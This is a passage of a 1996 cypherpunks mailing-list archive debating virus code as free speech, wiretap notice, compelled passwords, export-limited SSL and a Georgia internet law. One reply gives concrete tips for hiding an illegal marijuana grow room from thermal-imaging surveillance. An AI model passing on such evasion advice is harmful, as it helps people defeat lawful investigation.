subscribed to, in case you don't already have it:

#### No info available for clueless.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Sun, 21 Apr 1996 01:13:29 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <ad9da80f000210044d78@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.960420095805.28058B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, Timothy C. May wrote:

> It should be interesting to see what happens when the Bernstein ruling
> (assuming it is further upheld as the court case and appeals proceed) meets
> the proposed law making the writing of virus code a crime.
> 
> If crypto  software is essentially speech, albeit in a non-traditional
> human language, then virus software is no different.

    I think the determination of whether virus software will be 
considered free speech (and thus legal) or speech needing limits 
(illegal) will be based entirely on whether that code is active in system 
memory or just sitting on a hard drive.  

    The U.S. and many other countries already have laws that make it a crime
to destroy or manipulate data in an unauthorized manner, which active viruses
would qualify as doing.  In comparison to someone shouting "I have a bomb," on
an airplane, this type of speech is already illegal.  However, I would have 
no problem with people having viruses or virus source code on their own 
computers or sharing this code with others as long as the receiver is 
aware of the infective nature of the software.  

    My guess is that the law will probably pan out in this manner.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Sun, 21 Apr 1996 02:00:38 +0800
To: cypherpunks@toad.com
Subject: Wiretapping v warrants
In-Reply-To: <m0uATlP-00092YC@pacifier.com>
Message-ID: <Pine.BSI.3.91.960420101301.28058D-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Apr 1996, jim bell wrote:

> Here's a question, however:  What, exactly, stands between the way it is 
> supposedly done, today, and wiretapping with none of these "protections."

    First and foremost Congress, then the Judicial system and finally the 
people themselves.  As far as I know, the Communications Assistance for 
Law Enforcement Act still hasn't been enforced since Congress won't give 
them funding until better statistics are provided by the FBI as to why 
they need the ability to place wiretaps so extensively.  I'm sure the 
reasonability of privacy would come into play with the court system along 
with who knows what other claims.  

> And another question I've never seen a satisfactory answer for:  Why is 
> there not an automatic policy to inform the person tapped, at least after 
> the tap is removed, analogous to the level of information the victim of a 
> search warrant normally gets?

    Since I'm not exactly sure whether the targets of a wiretap are ever 
informed that their conversations were monitored if they aren't later 
prosecuted using the info gained through the wiretap, I couldn't really 
comment on why if that is the case.  

    Personally, I think a better example could be used.  When a person is 
placed under visual surveilance they also are uninformed that their 
actions are being scrutinized.  Their conversations can be picked up 
using high powered microphones and they can be plainly seen with 
binoculars or even night vision goggles.  I would assume that they 
probably aren't informed after the fact either unless the surveilance is 
used against them in court.

    Regardless, I think that if people aren't informed that they were the 
subject of an investigation after they are cleared, they should be.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Sat, 20 Apr 1996 06:31:10 +0800
To: cypherpunks@toad.com
Subject: Enough of this How do I get on coderpunks(Please reply via email only NOT to the list)
Message-ID: <199604201839.LAA15496@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain





   The noise level has finally gotten to me...
can someone tell me how to get on coderpunks
private email replies only please 
I will be unsubscribing from cypherpunks shortly...


     cheers
     kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 21 Apr 1996 05:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <ad9e769802021004d3a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:05 PM 4/20/96, Bruce Marshall wrote:
>On Fri, 19 Apr 1996, Timothy C. May wrote:
>
>> It should be interesting to see what happens when the Bernstein ruling
>> (assuming it is further upheld as the court case and appeals proceed) meets
>> the proposed law making the writing of virus code a crime.
>>
>> If crypto  software is essentially speech, albeit in a non-traditional
>> human language, then virus software is no different.
>
>    I think the determination of whether virus software will be
>considered free speech (and thus legal) or speech needing limits
>(illegal) will be based entirely on whether that code is active in system
>memory or just sitting on a hard drive.

I of course was being careful to specifically say "the proposed law making
the writing of virus code a crime."

I think most of us will agree that destroying someone else's data via
viruses may well be a crime, depending on circumstances.

However, the talk of trying to felonize the _writing_ of virus code,
irrespective of whether it is ever used criminally, is what I think the
Bernstein decision bears on.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 06:36:46 +0800
To: Bruce Marshall <cypherpunks@toad.com
Subject: Re: Wiretapping v warrants
Message-ID: <m0uAhuj-00090KC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 4/20/96 -0500, Bruce Marshall wrote:
>On Fri, 19 Apr 1996, jim bell wrote:
>
>> Here's a question, however:  What, exactly, stands between the way it is 
>> supposedly done, today, and wiretapping with none of these "protections."
>
>    First and foremost Congress,

But were these "protections" the product of a law passed by Congress?

> then the Judicial system 

I'm feeling much better....NOT!

>and finally the people themselves.

It's called "Right to Keep and Bear Arms."


>> And another question I've never seen a satisfactory answer for:  Why is 
>> there not an automatic policy to inform the person tapped, at least after 
>> the tap is removed, analogous to the level of information the victim of a 
>> search warrant normally gets?
>
>    Since I'm not exactly sure whether the targets of a wiretap are ever 
>informed that their conversations were monitored if they aren't later 
>prosecuted using the info gained through the wiretap, I couldn't really 
>comment on why if that is the case. 

The reason you don't know is simply that there is no _Constitutional_ 
reason.  There is merely a practical one:  The act of wiretapping does not 
automatically inform those tapped, in the same way that service of a search 
warrant does, so the government CONVEEEENIENTLY forgets to tell them.  Most 
government suck-ups don't even want to address this issue; they have no 
explanation.  Unlike them, you acknowledged that you weren't away of the reason why.

>    Personally, I think a better example could be used.  When a person is 
>placed under visual surveilance they also are uninformed that their 
>actions are being scrutinized.  Their conversations can be picked up 
>using high powered microphones and they can be plainly seen with 
>binoculars or even night vision goggles.  I would assume that they 
>probably aren't informed after the fact either unless the surveilance is 
>used against them in court.

I seem to recall a news item from Washington state within the last couple of 
years in which a conviction was thrown out because evidence was obtained  
with thermal-IR imagers.  You know, look for the hot house and it's being 
used to grow pot.  Problem is, that kind of viewing is not normally publicly 
apparent, so a citizen has a reasonable belief that it can't be used against 
him.  In another case, in Oregon, the use of night-vision goggles to observe 
people (at least in collecting evidence) was thrown out, for the same 
reason:  Even if, arguably, people were out "in public," they had a 
reasonable expectation that they would not be observed if they were careful 
to remain in the dark.

One more thing:  Until about 1968, the private use of tiny recording 
microphones, in public, was essentially unlimited.  About that year, in many 
states, it was restricted. (In some states it's illegal to record 
conversations by surreptitious means, EVEN IF you're a party to that 
conversation.  How bizarre!)  My theory is that politicians recognized, 
correctly, that they would be the ones most subject to such recording, and 
since they engaged in incriminating (bribery) conversations fairly 
regularly, they didn't want lobbyists to be able to collect a series of 
recorded conversations that could later be used against the politician if 
they later fell out of favor.


>    Regardless, I think that if people aren't informed that they were the 
>subject of an investigation after they are cleared, they should be.
>Bruce Marshall

The reason I consider "the system" to be so crooked is that it tries to get 
away with things like this whenever it can.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sun, 21 Apr 1996 06:40:33 +0800
To: perry@piermont.com
Subject: Re: Add-in encryption module to Netscape
In-Reply-To: <199604201650.MAA14845@jekyll.piermont.com>
Message-ID: <199604201932.MAA01387@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> You made a mistake in buying Netscape commerce in the first place, but
> don't despair! You can still get Apache, an excellent web server, and
> an unencumbered SSL module that you can use without restriction
> outside the U.S. (if you want to run it inside the U.S. you need to
> pay a fee because of the patents on RSA).
> 

	At least point the guy at a URL:

Outside the US: http://www.algroup.co.uk/Apache-SSL/
Inside the US: http://apachessl.c2.net/


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 06:44:00 +0800
To: tcmay@got.net
Subject: Re: 5th protect password?
Message-ID: <m0uAiWV-00091CC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:33 PM 4/19/96 -0800, Roger  Schlafly wrote:

>Is this really an issue?  I am not an expert, but I just read a
>Supreme Court case:
>
>   DOE v. United States, 487 U.S. 201; 108 S. Ct. 2341 (1988)
>
>It involved someone who was ordered by the court to consent to the
>Cayman Islands bank to turn over account records.  The Supreme
>Court said yes, because it is "more like 'be[ing] forced to
>surrender a key to a strongbox containing incriminating documents'
>than it is like 'be[ing] compelled to reveal the combination to
>[petitioner's] wall safe.'"
>
>The quote refers to Stevens' dissent, which said:
>
>   A defendant can be compelled to produce material evidence that
>   is incriminating.  Fingerprints, blood samples, voice
>   exemplars, handwriting specimens, or other items of physical
>   evidence may be extracted from a defendant against his will.


As you might expect, I see a problem (and a pattern!) with even these 
examples.  Notice that with the possible exception of "handwriting 
specimens", the examples above all represent pieces of evidence whose 
utility was only made technologically possible by developments done more 
than a century after the writing of the Constitution.  Fingerprints have 
only come into use in this century, voiceprints only in the last 30 or so 
years, blood samples were only uniquely identifiable within the last 10-15 
or so, etc.  I think even graphology (handwriting analysis) for legal 
purposes is likewise comparatively recent, although there is no obvious 
technological reason which this should have been so.  The last category, 
"other items of physical evidence" is too unspecific to interpret.

The problem?  Well, with the exception of the polygraph (whose reliability 
is severely (!) in doubt), I can't think of another technology which has 
been denied to cops by refusing their insistence on being given evidence.  
The implication, unfortunately, is that whereever a new technology pops up, 
the courts regularly ignore the fifth amendment, finding some excuse to 
insist that a defendant provide evidence.  This really isn't surprising:  
Remember, the Constitution was written by _revolutionaries_, while the 
infringements on that Constitution are done by _bureaucrats_.  Any 
bureaucratic interpretation of the Constitution is inherently flawed;  the 
proper, "revolutionary" interpretation of the 5th amendment is that a 
defendant should in no way be required to cooperate with the prosecution if 
the results of that cooperation could conceivably be used to convict him.

Anyone who denies this should be required to make a list of the kinds of 
evidence which was regularly demanded of a 1783-era defendant.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 21 Apr 1996 03:38:45 +0800
To: runner@asiapac.net
Subject: Re: Add-in encryption module to Netscape
In-Reply-To: <199604192338.HAA06653@gandalf.asiapac.net>
Message-ID: <199604201650.MAA14845@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



runner@asiapac.net writes:
> I'm not in the US of A and the Netscape commerce server that my
> employer recently purchased has only 48bit key (as told by the
> salesman). My question is whether it is possible to add-in my own
> security module (RSA) and secondly, how difficult is it? The
> salesman cannot answer me.

You made a mistake in buying Netscape commerce in the first place, but
don't despair! You can still get Apache, an excellent web server, and
an unencumbered SSL module that you can use without restriction
outside the U.S. (if you want to run it inside the U.S. you need to
pay a fee because of the patents on RSA).

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 21 Apr 1996 06:33:51 +0800
To: Bruce Marshall <brucem@wichita.fn.net>
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.BSI.3.91.960420095805.28058B-100000@wichita.fn.net>
Message-ID: <Pine.BSF.3.91.960420125016.6813A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>     I think the determination of whether virus software will be 
> considered free speech (and thus legal) or speech needing limits 
> (illegal) will be based entirely on whether that code is active in system 
> memory or just sitting on a hard drive.  

In Canada, there is a law that makes "unauthorized use of computing
resources" illegal. That makes both hacking and malicious virus spreading
illegal with one law, without making it illegal to share virus information
and source code. 

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 06:47:56 +0800
To: <cypherpunks@toad.com>
Subject: Re: EFF/Bernstein Press Release
Message-ID: <v02120d0dad9ef12ae10c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 4/19/96, Alan Olsen wrote:

>I have been seening a surprising amount of rant from the forces of
>Government about keeping information out of "the hands of terrorists".  I am
>wondering how this is going to be brought about.  The books are there.  They
>can be ordered from a number of mail order firms.  They can also be found in
>used book stores across the country.  The information is alos on the net, on
>cd-roms and other mediums of storage.  How are they going to stuff the
>tentacles back into the can?

Trivial.

Publish a book -> Ten years.
Sell a book -> Ten years.
Sell CDROM -> Ten years.
Publish on the net (at this time US only, but identical campaigns are
underway in just about any country with a decent net connection) -> Ten
years.

Won't stop the hard core terrorist, but will keep the general population
from taking action once they finally realize what is going on.


Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <umwalber@cc.UManitoba.CA>
Date: Sun, 21 Apr 1996 05:38:49 +0800
To: cypherpunks@toad.com
Subject: ApacheSSL
Message-ID: <199604201850.NAA09592@electra.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


An ISP that I have ties with  is looking to set up a secure server.  
Currently, they are running Apache.  I told them that for ~$500 they 
can put on Apache SSL and be all ready.  However, they want to buy 
Netscape (for the name, I've already given them the 40bit gospel), 
put it on a separate, firewalled machine, allow no access to it, etc, 
etc.  Is all this paranoia necessary?

Sean
       =================] Will work for RAM [==================
       |     Sean A. Walberg       | PGP key |  C programmers |
       |  Computer Engineering ][  |   on    |    do it in    |
       | umwalber@cc.umanitoba.ca  | servers |   libraries!   |
       =============] http://www.escape.ca/~sean [=============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mirele@xmission.com
Date: Sun, 21 Apr 1996 07:12:56 +0800
To: cypherpunks@toad.com
Subject: OS/2 encryption utilities
Message-ID: <199604202027.OAA28387@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


Due to the fact that I have been threatened by the Church of Scientology
with legal action if I do not cease and desist posting encheferated
parodies of their secret scripture (per a letter I received from Cult
attorneys via Federal Express today) I am in search of OS/2 disk
encryption programs.

If you can help, please respond asap with suggestions.

Thank you,
Deana M. Holmes

mirele@xmission.com
-----BEGIN GEEK CODE BLOCK-----
Version:  3.1
GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 09:11:46 +0800
To: Dave Del Torto <cypherpunks@toad.com
Subject: Re: [EVENT] cheap date w/Bob Dole
Message-ID: <m0uAlHS-00091CC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Public Policy Issues Forum on Information Security"
>(aka "Celebration of 20 years of Public Key Cryptography" 1976-1996)
>
>Co-Hosts:
> Cylink Corporation
> The Churchill Club
[stuff deleted]

> - Senator(s) Larry Pressler (and Bob Dole?*)
>on new legislation (The Encryption Communications Privacy Act of 1996) to
>loosen restrictions on strong crypto in the U.S.

What, exactly, are the "restrictions on strong crypto in the U.S.?

> - Senator Conrad Burns (R/Montana)
>on his proposed bill (Promotion of Commerce On-Line in the Digital Era)
>which could include preventing government from becoming an escrow registry
>bureau.

I'm _still_ waiting to see the text of this bill.  

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 21 Apr 1996 09:15:53 +0800
To: cypherpunks@toad.com
Subject: Re: Add-in encryption module to Netscape
In-Reply-To: <199604192338.HAA06653@gandalf.asiapac.net>
Message-ID: <31796791.3F54@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


runner@asiapac.net wrote:

> I'm not in the US of A and the Netscape commerce server that my employer
> recently purchased has only 48bit key (as told by the salesman).

For exportable clients and servers, the symmectric keys for doing bulk
encryption are 40 bits.

> My question is
> whether it is possible to add-in my own security module (RSA)

The symmetric (RSA) keys are at least 512 bits.

> and secondly, how
> difficult is it? The salesman cannot answer me.

Netscape cannot get permission to distribute software with "pluggable"
crypto. This and the above restrictions are the result of U.S.
regulations.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 21 Apr 1996 07:17:30 +0800
To: cypherpunks@toad.com
Subject: Re: Add-in encryption module to Netscape
In-Reply-To: <199604201650.MAA14845@jekyll.piermont.com>
Message-ID: <199604202042.PAA04800@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> You made a mistake in buying Netscape commerce in the first place, but
> don't despair! You can still get Apache, an excellent web server, and
> an unencumbered SSL module that you can use without restriction
> outside the U.S. (if you want to run it inside the U.S. you need to
> pay a fee because of the patents on RSA).

The browsers present a bit of a problem as well -- the free Netscapes that
people download uses small keys, so it won't matter if you use an Apache
or Netscape server if people browse your site with Netscape navigators.  I
think there are full strength Mosaic's available, but I've never used
them. 

Also, you should check to see if you can get a verisign certificate for 
the international version of apache-ssl -- if you can't, that might cause 
you problems as well.

The best answer for these sorts of problems (at least for those of you not
constrained by ITAR) might be java form processing applets that use their
own crypto routines to submit the data.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Computer Virus Help Desk <vhd@pobox.com>
Date: Sun, 21 Apr 1996 07:34:29 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <2.2.32.19960420195030.0067c844@indy.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 4/19/96 -0700, Tim May wrote:
>
>It should be interesting to see what happens when the Bernstein ruling
>(assuming it is further upheld as the court case and appeals proceed) meets
>the proposed law making the writing of virus code a crime.
>
>If crypto  software is essentially speech, albeit in a non-traditional
>human language, then virus software is no different.

To the best of our knowledge simply writing Virus Code including it's
"distribution" is not a crime in the United States.  However, the
deliberate, malicious upload or infection of another's computer or system is
a crime in many states. 

The writing and or distribution of Computer Viruses is a crime in some
European countries.

We don't see the "Bernstein" ruling as having an effect in the U.S. one way
or the other.  Virus Code seems to be treated just like "speech" right now.
Use "it" to yell "fire" in a crowded theater and see what happens.
Deliberately and maliciously infect another's computer or system with a
computer virus and see what happens.

What proposed law making writing virus code a crime were you referring to ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 21 Apr 1996 10:04:37 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Wiretapping v warrants
Message-ID: <v02120d16ad9f1b618a71@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 4/20/96, jim bell wrote:

>I seem to recall a news item from Washington state within the last couple of
>years in which a conviction was thrown out because evidence was obtained
>with thermal-IR imagers.  You know, look for the hot house and it's being
>used to grow pot.

You know, it is cases like this that I consider evolution in action.

What was the fool doing growing pot in a house, anyway?

Any smart pot grower knows that you grow pot in grow rooms underground.
With a large septic tank above it. Through the septic tank, you bubble both
the exhaust of the diesel generator used to power the high pressure sodium
lights, as well as the exhaust of the grow room cooling fan. That
neutralizes the exhaust smell and provides an obvious explanation to the IR
scanners overhead, since septic tanks are naturally hot due to the
bacterial activity taking place within.

Amateurs.


Disclaimer: My opinions are my own, not those of my employer, DigiCash, Inc.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@isdn.net>
Date: Sun, 21 Apr 1996 08:12:57 +0800
To: cypherpunks@toad.com
Subject: Georgia Legislation - Remailer Effect???
Message-ID: <199604202128.QAA09545@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

T have included copy of text from c/net about a bill passed in the 
Georgia legislature.  It would definately impact remailer service.  
Location of the remailers might fall in with the Arkansas (or was it 
Tennessee) BBS/Porno case.  The URL is at:

http://www.cnet.com/Content/News/Files/0,16,1144,00.html

Article follows
- ---------------------------------

Georgia OKs "Net Police" law

                By Rose Aguilar
                April 19, 1996, 5 p.m. PST 

                A bill signed into law this week by Georgia Governor 
Zell Miller has sparked yet another firestorm
                over what role the government should take in curbing 
the Internet and whether legislators are
                sufficiently techno-savvy to make considered judgments. 

                House Bill 1630 was introduced on February 8 by Georgia 
House of Representatives member Don
                Parsons (R-Marietta). The bill makes it illegal to 
falsely identify yourself or place a registered
                trademark or logo on your home page. The bill also 
makes it illegal for email users to have addresses
                that don't include their own names. 

                For example, an individual who sets up a site that 
gives the appearance of representing a government
                agency by using a state seal could be sued by the 
state. Also, "vanity" email addresses like
                jackpot@luckynumber.com purchased from a new service 
called VanityMail.com are now illegal in
                the state of Georgia. If someone is sued under the new 
law, the court will decide the penalties. 

                Parsons says he drafted the bill to solve the problem 
of online impersonation. "Back in the winter I
                started hearing about home pages through the news that 
offer remedies and health related services.
                To the untrained eye the pages make it appear that the 
information provided is valid and could be
                some kind of remedy," Parsons said. "After some thought 
and research I decided to present the bill." 

                The Electronic Frontier Foundation (EFF), a civil 
liberties organization devoted to technology-related
                issues, says the bill could undermine one of the 
essential benefits of the Net: the ability to link
                information posted to one site with related information 
posted to another. 

                "The way the bill is written states that you can't put 
a button on your homepage that says, 'Click here
                to go to Wired magazine.'" If Wired is copyrighted I 
would be under violation if I didn't have their
                permission. Instead, I would have to say, 'Click here 
to go to this cool magazine,'" said Shari Steel, a
                staff attorney with the EFF. 

                Parsons retorts back that the foundation is 
misinterpreting the bill. "The EFF is reading something into
                the bill which just isn't there. The bill has nothing 
to do with links. The bill is about using a name or a
                trademark to represent your page as being someone 
else's," he said. 

                The problem is that the wording of the law leaves it 
open to multiple interpretations, according to the
                EFF. "He created a very vague law that could very well 
make everyone on the Internet a criminal,"
                said Steel. Furthermore, the EFF is accusing Parsons of 
introducing the bill to help his employer, Bell
                South, win a lawsuit. 

                Bell South announced this week that it has filed a suit 
against startup company "realpages.com" in a
                battle over domain names on the Internet. Realpages.com 
designs and maintains Web pages for other
                businesses. Bell South, however, has a trademark on the 
term The Real Yellow Pages for its printed
                directories and claims that this extends to a trademark 
on the "realpages.com" domain name for the
                Net. The Baby Bell wants to use "realpages.com" because 
"Realyellowpages.com" is too long. 

                "This [bill] has been masterminded by Bell South. It's 
obvious, considering that the legislator who
                wrote the bill is a Bell South employee," said Stanton 
McCandlish, an online activist with the EFF.
                "This bill would give Bell South the victory that they 
want, but probably aren't going to get in court.
                Bell South is going to lose that case and lose big," he 
said. 

                Parsons confirms that he works for Bell South but 
denies the charge. "The Bell South Corporation
                has no interest in this bill. I don't even think the 
cases are the same," Parsons said. "I put this bill
                together long before that case and they are totally 
separate," he said. 

                Whatever Parsons' motivations, even some other Georgia 
representatives agree that he managed to
                get a bill passed with potential negative repercussions 
for the use of the Internet. 

                "Many legislators are afraid of technology and they 
fear the power of information and the Internet,
                especially the Internet in the power of the voters and 
that's a nationwide problem," said
                Representative Mitchell Kaye (R-Marietta). 

                Kaye is the Web master of a site called the 
Conservative Policy Caucus (CPC), which posts
                information about House activities from the viewpoint 
of the conservative legislative caucus. During
                debate over his bill, Parsons referred to the CPC site 
as an example of one that passes itself off as an
                official government site. 

                Kaye says that Parsons is wrong about the CPC site and 
that it will be unaffected by the bill. But he's
                still concerned about the potential dampening affect 
that it will have on the use of the Internet in
                Georgia. "I'm concerned about the bigger page of the 
Internet," said Kaye. "The bottom line is that
                this is an unconstitutional infringement upon free 
speech and literally puts Georgia in the same
                category as communist China." 

                Ridiculous, says Parsons. "I would never want to 
restrict anybody's freedom of speech, but I believe
                that end users have some right to know who is behind 
what they are looking at," he said. 

                The passage of the law has since sparked conversation 
on Steve Outing's online-news mailing list. 

Copyright =A9 1996 c|net inc. all rights reserved 

- ----------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMXlW3hKvccEAmlQ9AQFTSAf+PuyHzI8sOFcye0hCpMrY0I8lWD9CLJcW
KsD+2hfFAfjjRsA5YzB2LWhfZ2JfGrzwFibHrX4nc+qlDpZmECOipAdmDLf5/EmA
149YGLbLmn/E44BcsJK2MCFluASonON9HADZGrvr8IYDumRde7ycIshx3+YZ7KwL
Ix4g+PsIP1mzRGTi0kkBgJL7/m6g7xY/QH0XPSZZEbiFSBXIFusYQ/YZCCH5JLUa
VaGgWURRNnwz3eDHgfW0Ck+ES4HNV2yXDR5IQ/IL3fufZOjt2NCczomr29ebWJ9I
IvXYQVZv8I+Wsus/YisgOA0Hz1VoNPdiUQgUPf4gO0MAEgo/9Ai1yw==
=INB6
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 21 Apr 1996 10:56:48 +0800
To: Lisa Pease <ssalgaller@CCGATE.HAC.COM
Subject: Re: Oklahoma City - One Year Later - The Coverup Continues !
Message-ID: <199604210004.RAA02580@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996 ssalgaller@CCGATE.HAC.COM wrote:
>      Suggested Reading:
>      
>      Oklahoma City - The Suppressed Truth 

We have already been through this several times on the cypherpunks list.

The physical evidence indicates a very large deflagrating explosive,
such as a truck full of ANFO or gunpowder, not a small detonating
(military) explosive.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 12:03:12 +0800
To: Black Unicorn <mirele@xmission.com
Subject: Re: OS/2 encryption utilities
Message-ID: <m0uAnQG-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:08 PM 4/20/96 -0400, Black Unicorn wrote:
>On Sat, 20 Apr 1996 mirele@xmission.com wrote:
>
>> Due to the fact that I have been threatened by the Church of Scientology
>> with legal action if I do not cease and desist posting encheferated
>> parodies of their secret scripture (per a letter I received from Cult
>> attorneys via Federal Express today) I am in search of OS/2 disk
>> encryption programs.
>
>Were I a Co$ attorney, I would use this to bring discovery violations 
>if I took you to court.

You know, I've always thought it odd how some people misuse the English 
language when they speak in their chosen shorthand.  "bring discovery 
violations"?  How, exactly, does one _BRING_ a "discovery violation"?   
Like, maybe, bring it in a whellbarrow?!?   Is "bring" a proper word in this 
context?  Why not stop using that silly shorthand.

BTW, you seem to have forgotten that this would be an excellent way to deter 
the kind of "knock and smash" warrant service common amongst government 
thugs.  Any argument by the cops that "we must break down the door or else 
they'll erase the data!" is rendered obviously silly if the data is ALREADY 
encrypted and inaccessible. If anything, it would make the data permanently 
inaccessible since it would make (arguably) the release of a decrypt key 
"incriminating" if it were a criminal case. 

Yet another excellent reason to encrypt the data is that it deters 
burglaries, where the purpose of the burglary is to get this data illegally. 
 Given the COS's history, that is a reasonable fear.

Jim Bell

jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Apr 1996 12:11:46 +0800
To: cypherpunks@toad.com
Subject: Re: Georgia Legislation - Remailer Effect???
Message-ID: <m0uAnQI-0008yvC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:28 PM 4/20/96 -0500, Lou Zirko wrote:

>T have included copy of text from c/net about a bill passed in the 
>Georgia legislature.  It would definately impact remailer service.  
>Location of the remailers might fall in with the Arkansas (or was it 
>Tennessee) BBS/Porno case.  The URL is at:
>http://www.cnet.com/Content/News/Files/0,16,1144,00.html
>Article follows
>- ----------------------------
>Georgia OKs "Net Police" law
>                By Rose Aguilar
>                April 19, 1996, 5 p.m. PST 
> A bill signed into law this week by Georgia Governor 
>Zell Miller has sparked yet another firestorm
> ver what role the government should take in curbing 
>the Internet and whether legislators are
> sufficiently techno-savvy to make considered judgments. 
>
> House Bill 1630 was introduced on February 8 by Georgia 
>House of Representatives member Don
> Parsons (R-Marietta). The bill makes it illegal to 
>falsely identify yourself or place a registered
>trademark or logo on your home page. The bill also 
